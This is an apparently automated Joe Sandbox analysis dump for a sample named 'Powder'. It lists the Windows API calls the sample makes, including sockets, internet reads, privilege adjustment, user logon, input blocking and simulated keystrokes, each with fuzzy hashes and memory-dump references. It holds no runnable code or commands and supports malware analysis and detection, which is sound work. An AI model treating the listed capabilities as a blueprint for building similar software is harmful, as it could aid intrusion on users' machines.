                                                    • Part of subcall function 00E0166C: DefDlgProcW.USER32(?,00000020,?), ref: 00E016B4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: c4f873f1f098510b80efa60a09e651f6ff060df0f3458d2e693a49bdf65ca8e3
                                                  • Instruction ID: b73f80c381e3d77fda8af3e95f8f59f08d630ca861848f123880bb6d67449f8f
                                                  • Opcode Fuzzy Hash: c4f873f1f098510b80efa60a09e651f6ff060df0f3458d2e693a49bdf65ca8e3
                                                  • Instruction Fuzzy Hash: 19A12570109504BEE628BB6A8C49EBB39DDDF4230AF24315AF546FE1D5CB219D82C275
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E6C329
                                                  • _wcscmp.LIBCMT ref: 00E6C359
                                                  • _wcscmp.LIBCMT ref: 00E6C36E
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00E6C37F
                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E6C3AF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 2387731787-0
                                                  • Opcode ID: 49701584d5b83fb52a999d02a58c03bad32a5e98b1e47e8ffec624e0a2ce8dfa
                                                  • Instruction ID: f7df451dbae3d6e89f3d07f66bd313a29f1d4d6c9a736a412b448200c4eb2618
                                                  • Opcode Fuzzy Hash: 49701584d5b83fb52a999d02a58c03bad32a5e98b1e47e8ffec624e0a2ce8dfa
                                                  • Instruction Fuzzy Hash: 2051CD756406028FD714DF28E490EAAB3E4FF49314F20565EE9AAE73A1CB30ED04CB91
                                                  APIs
                                                    • Part of subcall function 00E78475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E784A0
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E76E89
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E76EB2
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00E76EEB
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E76EF8
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00E76F0C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 67940e72f32364efba97fdaa6a33cc29d3dd9e85127bd06a33c0a0322374bc40
                                                  • Instruction ID: ab70e5e89896106891d9be93a0d545b9cbce389d17dce537f38de1c50a9e647a
                                                  • Opcode Fuzzy Hash: 67940e72f32364efba97fdaa6a33cc29d3dd9e85127bd06a33c0a0322374bc40
                                                  • Instruction Fuzzy Hash: 3041DEF5700600AFDB10AF64D986F6E73E8DB04714F049459FA4ABB3D2DA709D408BA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: a5c886b5901ba2263f855962d491a38090fe8b023db0b7c2cfc8104bdc812467
                                                  • Instruction ID: 4c7530a680dfbc3ce867f6edf75a3d4a527bc65c063345771f0bb63652671b99
                                                  • Opcode Fuzzy Hash: a5c886b5901ba2263f855962d491a38090fe8b023db0b7c2cfc8104bdc812467
                                                  • Instruction Fuzzy Hash: 4411B272300A119FE7267F669C84A6E7B99EF84721B41556AE84EF7281DF30D9018BA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LocalTime__swprintf
                                                  • String ID: %.3d$WIN_XPe
                                                  • API String ID: 2070861257-2409531811
                                                  • Opcode ID: c1153a8d8204d1b7ce3a4ae18918b304d64fb0c653bfad7dc28a63afa4f31e57
                                                  • Instruction ID: c7ebfe7798cd03e2108f515dba39018df135dbe5f2f0eb1df67df8e24ba13e19
                                                  • Opcode Fuzzy Hash: c1153a8d8204d1b7ce3a4ae18918b304d64fb0c653bfad7dc28a63afa4f31e57
                                                  • Instruction Fuzzy Hash: 6DD01272C18118EEC708DB90E845DFA737CAB04300F102862F646B2080E275978C9F22
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E71ED6,00000000), ref: 00E72AAD
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E72AE4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: 838fb0fcc1d4b88d13ccee9cf5e612ffeebe3d93e50da907e2743c53901e66ee
                                                  • Instruction ID: 91687faa9c1d2f59fe045423ed9d7b55769bfdc74b062ba76fde82d6ff61e00c
                                                  • Opcode Fuzzy Hash: 838fb0fcc1d4b88d13ccee9cf5e612ffeebe3d93e50da907e2743c53901e66ee
                                                  • Instruction Fuzzy Hash: 7241A471A00309BFEB20DE95DC85EBBB7ECEB40768F10905EF709B6141EA71AE419760
                                                  APIs
                                                    • Part of subcall function 00E20FE6: std::exception::exception.LIBCMT ref: 00E2101C
                                                    • Part of subcall function 00E20FE6: __CxxThrowException@8.LIBCMT ref: 00E21031
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E593E3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E59410
                                                  • GetLastError.KERNEL32 ref: 00E5941D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: bcda805c5a8b33ed419eaad83ccea869ec28dd4d1faf85214c04bd005fb943ab
                                                  • Instruction ID: d5204f1b29f5f81f7bf5af584710451709b0e72f5d65d0fab26cfdba5e3d7b98
                                                  • Opcode Fuzzy Hash: bcda805c5a8b33ed419eaad83ccea869ec28dd4d1faf85214c04bd005fb943ab
                                                  • Instruction Fuzzy Hash: BD11B2B1414204EFD728DF54ECC5D6BB7FCEB44711B10851EE855A7241EB30AC45CB60
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E642FF
                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00E6433C
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E64345
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                  • String ID:
                                                  • API String ID: 33631002-0
                                                  • Opcode ID: 143d669becb4d7331c461e707ded5f9ee76466153e035a91d4d58d6339fbf39a
                                                  • Instruction ID: f20cc0e639aca2e7af7123d77637fd43f4af7a1ce75815a8f343934d69a08325
                                                  • Opcode Fuzzy Hash: 143d669becb4d7331c461e707ded5f9ee76466153e035a91d4d58d6339fbf39a
                                                  • Instruction Fuzzy Hash: 241182B2941229BEE7109BE9AC44FAFBBBCEB09754F100256B914F7291D2745D0487A1
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E64F45
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E64F5C
                                                  • FreeSid.ADVAPI32(?), ref: 00E64F6C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: d7603acdbea378d8b57a3f72a863620e34205c5305e2126cae25fe85a3e1065c
                                                  • Instruction ID: 034f65e4144dc86e0200b4288294d485abf894bf8489728d8eb72e1447add25e
                                                  • Opcode Fuzzy Hash: d7603acdbea378d8b57a3f72a863620e34205c5305e2126cae25fe85a3e1065c
                                                  • Instruction Fuzzy Hash: 80F04F75A5130CBFDF00DFE1DC89AADBBBCEF08201F40486AA501E2180D7345A048B50
                                                  APIs
                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E61B01
                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00E61B14
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InputSendkeybd_event
                                                  • String ID:
                                                  • API String ID: 3536248340-0
                                                  • Opcode ID: 69e946fdf996c5156e670c7c21928070460b3ac95b57de5c61657c206dfed3e9
                                                  • Instruction ID: b59d69a989659844dd223c84e744c597a4270c8aa2c17ecdbe2034de957ca9d7
                                                  • Opcode Fuzzy Hash: 69e946fdf996c5156e670c7c21928070460b3ac95b57de5c61657c206dfed3e9
                                                  • Instruction Fuzzy Hash: C9F0377194020DAFDB11CF95D806BFE7BB4EF04316F00804AF955A6292D3799615DF94
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00E79B52,?,00E9098C,?), ref: 00E6A6DA
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00E79B52,?,00E9098C,?), ref: 00E6A6EC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: f6a87553bb7fc243254285e1c631566411570e4e72426e7d789ff60753d99ff0
                                                  • Instruction ID: 902d9f2c4b94c7247524b0e61d3b28d5b04091d4e0e2a516026b5cfc1a96d491
                                                  • Opcode Fuzzy Hash: f6a87553bb7fc243254285e1c631566411570e4e72426e7d789ff60753d99ff0
                                                  • Instruction Fuzzy Hash: 4FF0823555422DBFDB20AFA4DC48FEA77ACBF097A1F008166B918B6191D6309944CFA1
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58F27), ref: 00E58DFE
                                                  • CloseHandle.KERNEL32(?,?,00E58F27), ref: 00E58E10
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 607a8964d53ca77cb5692398f8a0b539339f20e822db6dc26bf0b1d02f30311c
                                                  • Instruction ID: d7fa3f685be38b4f9c4c2b91e7aa6c000ddfc178e30c4bc28370ec4589164335
                                                  • Opcode Fuzzy Hash: 607a8964d53ca77cb5692398f8a0b539339f20e822db6dc26bf0b1d02f30311c
                                                  • Instruction Fuzzy Hash: C8E0B676010610EFE7262B61FD09E777BEDEB04311B14896AF89AA0470DB62ACA4DB50
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E28F87,?,?,?,00000001), ref: 00E2A38A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E2A393
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: b4281ba1f26519c316559b57b4d1055634a0aecd2c78bf9c00bbd1059ba3ffdf
                                                  • Instruction ID: 01bef236beec5db30540c473e89c1a4d50479fa0c24dd9bf8b918c149000b5cb
                                                  • Opcode Fuzzy Hash: b4281ba1f26519c316559b57b4d1055634a0aecd2c78bf9c00bbd1059ba3ffdf
                                                  • Instruction Fuzzy Hash: 43B09232064208EFCA406BA2EC09B883F68EB44B62F804013F61D54060CB6254548A91
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 00E745F0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 8064ab679e914fb372b9abcb39286b1f970b8197e66040bf667c1b0954edb0a4
                                                  • Instruction ID: 30e2cac478f17e7730b878a48a533b0ac3e531417849e2c86fd43aa4ae61627b
                                                  • Opcode Fuzzy Hash: 8064ab679e914fb372b9abcb39286b1f970b8197e66040bf667c1b0954edb0a4
                                                  • Instruction Fuzzy Hash: 8EE04FB62102169FD710AF5AE804E9BF7E8AF94760F00C416FD49EB391DB70E9418B91
                                                  APIs
                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00E65205
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: 7a514758d43e35544d7da47fbc3ec261d92eaa18f39fe5399f285312086acf79
                                                  • Instruction ID: aeab646069f127461854992d7472012d1f2013f068e1cbb96fb78543344d0189
                                                  • Opcode Fuzzy Hash: 7a514758d43e35544d7da47fbc3ec261d92eaa18f39fe5399f285312086acf79
                                                  • Instruction Fuzzy Hash: 1BD09E973E2E0979EE580724BE1FF761688E3037C5FD4754A7142B50C1ECD458859431
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E58FA7), ref: 00E59389
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: f6ea029b7cf3736d0a78fe8d378d9b8d77b664fd90f00d99c303cd0b5dec1ba0
                                                  • Instruction ID: 3cd951c81359da33cd44c2df15fc3c2453b929615490b964cd050f9cdcf4faef
                                                  • Opcode Fuzzy Hash: f6ea029b7cf3736d0a78fe8d378d9b8d77b664fd90f00d99c303cd0b5dec1ba0
                                                  • Instruction Fuzzy Hash: 05D05E3226450EAFEF018EA4DC01EAE3B69EB04B01F808512FE15D50A0C775D835AB60
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00E40734
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: 79d60720469017d4c2daed4095710b0a4892caf71a70368f160701529a72e829
                                                  • Instruction ID: 5446dc6879dd57ba6f129fb1685aaf0b2ea82cad6760007650178d6817ec9ed7
                                                  • Opcode Fuzzy Hash: 79d60720469017d4c2daed4095710b0a4892caf71a70368f160701529a72e829
                                                  • Instruction Fuzzy Hash: 44C04CF1800109DFCB05DBA0D988EEE77BCAB04304F100456A105B2100D7749B448A71
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E2A35A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: bb8cc63ddb466cb8de7e385ac03b6c6733f1cc3799a9492cb191071e75deb888
                                                  • Instruction ID: 47057a42a1fb7f9f8a2f3363218f5ae673bd42640f956ac240ed036cb4cf32ea
                                                  • Opcode Fuzzy Hash: bb8cc63ddb466cb8de7e385ac03b6c6733f1cc3799a9492cb191071e75deb888
